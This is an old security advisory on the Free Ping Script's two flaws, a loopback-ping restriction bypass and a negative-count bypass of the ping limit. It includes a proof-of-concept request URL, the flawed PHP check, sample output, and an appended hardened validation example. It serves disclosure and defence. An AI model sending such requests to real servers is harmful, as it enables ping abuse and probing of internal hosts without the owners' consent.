
| Subject: | The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns) |
|---|---|
| Date: | 23 Jan 2006 20:54:13 -0000 |
[KAPDA::#23] - The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)

KAPDA New advisory

Vulnerable products : The WorldsEnd.NET - Free Ping Script
Vendor : http://www.theworldsend.net/
Risk : Low
Vulnerabilities : Restriction Bypass

Date :
--------------------
Found : Aug 2005
Vendor Contacted : N/A
Release Date : Jan 2006

About The WorldsEnd.NET - Free Ping Script :
--------------------
A simple PHP script for sending pings to remote hosts. This script has a bad reputation because of a previous remote command execution bug.

Vulnerability :
--------------------
Vuln 1: the script allows you to ping the server it is hosted on (127.0.0.1), and therefore to probe anything that is only reachable from that server.

Vuln 2: the script is meant to allow only 10 (or 4) pings per request. Look at the count value in the URL:

http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21

Maximum for count is: 10

The check that enforces this maximum tests only the upper bound. A negative count therefore passes the check and is handed straight to the ping binary, which accepts it as a positive count (a signed value interpreted as unsigned on the way from the script to ping), so the restriction can be bypassed.

Exploit :
--------------------
You can bypass the ping count restriction just by making the count value negative:

http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21

This bypasses the restriction and allows you to send any number of pings. Look at this code snippet from the script:

```php
// over count ?
if ($count > $max_count)   // <== HERE IS THE MISTAKE: IT DOESN'T CHECK FOR NEGATIVE NUMBERS
{
    echo 'Maximum for count is: '.$max_count;
    echo '<a href="'.$self.'">Back</a>';
}
else
{
    // replace bad chars
    $host = preg_replace("/[^A-Za-z0-9.]/", "", $host);   // <== HERE IS THE FIX FOR THE REMOTE CODE EXECUTION BUG
    echo '<body bgcolor="#FFFFFF" text="#000000"></body>';
    echo("Ping Output:<br>");
    echo '<pre>';
```

Output of a request with a negative count against the maximum of 10 (the reply line is repeated 50 times in the original output; only the first four are shown here):

```text
Ping Output:
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
[... 46 more identical reply lines ...]
Ping statistics for 127.0.0.1:
    Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```

Solution :
--------------------
No patch or fix exists. Until the vendor fixes it, the count has to be validated as an integer in the range 1..$max_count (not merely "not greater than $max_count"), and the host has to be rejected when it resolves to the loopback, link-local or private address ranges.

Original Advisory :
--------------------
http://www.kapda.ir/advisory-231.html

Credit :
--------------------
Discovered by cvh [at] kapda.ir
Greetz to all members of KAPDA and GSO.

KAPDA - Computer Security Researchers Institute
http://www.KAPDA.ir
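The following is an added example, not code from the Free Ping Script or from KAPDA: a hardened form of the two checks the advisory describes, in PHP because that is the script's language. The names $max_count, $host and $count follow the advisory's snippet; the function names, the HTTP handling at the bottom, and the choice of filter flags are assumptions made for this illustration.

```php
<?php
// Added example (not the Free Ping Script's own code). $max_count, $host and
// $count follow the advisory's snippet; everything else here is an assumption.

$max_count = 10;

// The vulnerable test from the advisory, kept for comparison. It only rejects
// values above the maximum, so a negative string such as "-50" passes and is
// handed to the ping binary unchanged.
function count_is_allowed_vulnerable($count, $max_count)
{
    return !($count > $max_count);
}

// Hardened test (vuln 2): the count must be an integer in [1, $max_count].
// FILTER_VALIDATE_INT rejects values below min_range (all negatives), empty
// strings, floats and junk such as "5;id", and returns a real int on success.
function validate_count($count, $max_count)
{
    $n = filter_var($count, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => $max_count]]);
    return $n === false ? null : $n;
}

// Host check (vuln 1): accept a hostname or IPv4 literal, resolve it, and refuse
// loopback, link-local and RFC 1918 destinations so the script cannot be used to
// ping the server it runs on or the hosts behind it. The resolved address, not
// the name, is returned so that ping does not resolve the name a second time
// (a rebinding DNS record could otherwise point somewhere else on that lookup).
function validate_host($host)
{
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}$/', $host)) {
        return null;
    }
    $ip = filter_var($host, FILTER_VALIDATE_IP) ? $host : gethostbyname($host);
    // gethostbyname() returns its argument unchanged on failure; that string
    // then fails FILTER_VALIDATE_IP below.
    if (filter_var($ip, FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
        return null;
    }
    return $ip;
}

// Build the command from validated values only. The advisory's output is from
// Windows ping, whose count flag is -n; iputils ping on Linux takes -c.
// escapeshellarg() is belt and braces here, since $ip is already a validated
// dotted quad and $count a bounded int.
function build_ping_command($ip, $count)
{
    $flag = stripos(PHP_OS, 'WIN') === 0 ? '-n' : '-c';
    return 'ping ' . $flag . ' ' . (int) $count . ' ' . escapeshellarg($ip);
}

// Request handling (assumed layout; the advisory does not show the script's
// surrounding code). Skipped when the file is run from the command line.
if (PHP_SAPI !== 'cli') {
    $count = validate_count($_GET['count'] ?? '', $max_count);
    if ($count === null) {
        echo 'Count must be an integer between 1 and ' . $max_count;
        exit;
    }
    $ip = validate_host($_GET['host'] ?? '');
    if ($ip === null) {
        echo 'Host not allowed';
        exit;
    }
    $output = (string) shell_exec(build_ping_command($ip, $count));
    echo '<pre>' . htmlspecialchars($output) . '</pre>';
}
```

With these checks in place, a request carrying count=-50 is refused before any command is built, and host=127.0.0.1 (or a name that resolves to it) is refused by the range flags rather than reaching ping. The regex in validate_host() deliberately rejects IPv6 literals; if IPv6 targets are wanted, the private-range check has to be extended to ::1 and the fc00::/7 and fe80::/10 ranges as well.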